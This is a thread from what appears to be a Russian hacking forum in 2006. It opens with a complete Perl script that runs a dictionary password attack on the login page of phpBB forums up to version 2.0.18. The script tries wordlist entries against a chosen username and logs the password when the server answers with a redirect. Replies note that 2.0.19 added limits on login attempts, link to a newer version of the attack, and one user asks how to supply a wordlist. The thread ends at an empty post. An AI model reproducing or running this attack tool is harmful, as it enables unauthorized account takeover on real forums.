Форумы phpBB <= 2.0.18 Remote Dictionary Attack Tool

Discussion in 'Уязвимости CMS/форумов' started by D1mOn, 26 Jan 2006.

  1. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    Code:
    #!/usr/bin/perl
    ############################################
    # Credits:                        Weakness and Xploit by DarkFig
    # Affected products:     All PhpBB versions <= 2.0.18
    # Type:                            Dictionnary attack
    # Solutions:                    None official , but many solutions are possible ;)
    # Note:                           If a line of the dictionnary file contain no data => "End of the password file"
    # Ps:                                Public after 1week lol
    #Demo:                            [url]http://rapidshare.de/files/9574771/phpbb_dict_login.rar.html[/url]                         
    # Team:                           Hackademie [] Acid_Root []  BoD []
    # PS:                               Volcom joyeux anniversaire , bon oki je suis en retard...voila ton cadeau ^^
    ############################################
    use IO::Socket;
    
    #--------------Utilisation--------------#
    if(@ARGV != 6){
    print "
    +---------------------------------------------------------------------------------+
    +------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+
    +---------------------------------------------------------------------------------+
    + Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    +
    +---------------------------------------------------------------------------------+
    + <host>        => The host where PhpBB is installed        |   [Ex: site.com]    +
    + <path>        => Path of the PhpBB board                  |   [Ex: /forum/]     +
    + <port>        => PhpBB board port                         |   [Default is 80]   +
    + <pass_file>   => File containing words (dictionnary file) |   [Ex: dico.txt]    +
    + <username>    => Username you want to bruteforce          |   [Ex: MasterLamer] +
    + <file_result> => File you want to log activity            |   [Ex: results.txt] +
    +---------------------------------------------------------------------------------+
    ";exit();}
    
    #--------------Data--------------#
    $host       = $ARGV[0];
    $path       = $ARGV[1];
    $full       = "$host"."$path";
    $port       = $ARGV[2];
    $pass_file  = $ARGV[3];
    $username   = $ARGV[4];
    $fileresult = $ARGV[5];
    $OK         = 0;
    $referer    = "http://"."$host"."$path"."login.php?redirect=";
    $postit     = "$path"."login.php";
    
    #--------------Hello world-----------------#
    print "
    +---------------------------------------------------------+
    + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
    +---------------------------------------------------------+
           [+] Username             | $username
           [+] Dictionnary file     | $pass_file
           [+] Attack log           | $fileresult
    +---------------------------------------------------------+";
    
    #--------------Password file--------------#
    open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
    chomp(@passdico = <FILE>);
    $nligne = "0";
    while ($OK ne 1) {
    $passwordz  = "$passdico[$nligne]";
    $request    = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
    $length     = length $request;
    if ($passwordz eq ""){print "\n       [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}
    
    #--------------Sending data--------------#
    $send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
    print $send "POST $postit HTTP/1.1\n";
    print $send "Host: $host\n";
    print $send "Content-Type: application/x-www-form-urlencoded\n";
    print $send "Content-Length: $length\n\n";
    print $send "$request\n";
    read $send, $answer, 15;
    close($send);
    
    #-------------Success---------------#
    if ($answer =~ /HTTP\/(.*?) 302/) {
    $OK = 1;
    print "
           [-] Trying the password "."$passwordz
           [+] User:     $username
           [+] Password: $passwordz
    +---------------------------------------------------------+\n";
    open results, ">$fileresult";
    print results "
    +---------------------------------------------------------+
    + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
    +---------------------------------------------------------+
        [+] PhpBB board               | $full
       [+] Board's port              | $port
       [+] Username                  | $username
       [+] Dictionnary file          | $pass_file
        [+] Number of test            | $nligne
        [+] Password found            | $passwordz
    +---------------------------------------------------------+\n";
    close(FILE);close(results);exit();}
    
    #-------------Failed-----------------#
    if ($OK == 0) {print "\n       [-] Trying the password "."$passwordz";$nligne++;}} 
     
    2 people like this.
  2. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Это уже давнишний сплойт. http://forum.antichat.ru/thread11983.html
    Именно из-за него, кстати, в версии 2.0.19 ограничили число попыток входа. Причем ограничили довольно прикольно. Если вы сделаете несколько попыток зайти на форум под ником админа и превысите разрешенное число попыток, а админ в это время будет он лайн, то его просто выбьет с форума. На то время, которое он сам указал в админке. :)
     
  3. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    ну хз я его увидел на http://h4cky0u.org, так что не вините за то что он давнишний)))
     
  4. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Да все отлично! В русском ачате его не было.
    Вот уже на 2.0.19 написали
    http://forum.antichat.ru/thread13510.html
     
    1 person likes this.
  5. sergio_nikol

    sergio_nikol New Member

    Joined:
    15 Oct 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Откудя взять библиотеки или строчку
    + <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
    можно просто опустить(вплане написать любой txt файл)?
     
  6. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154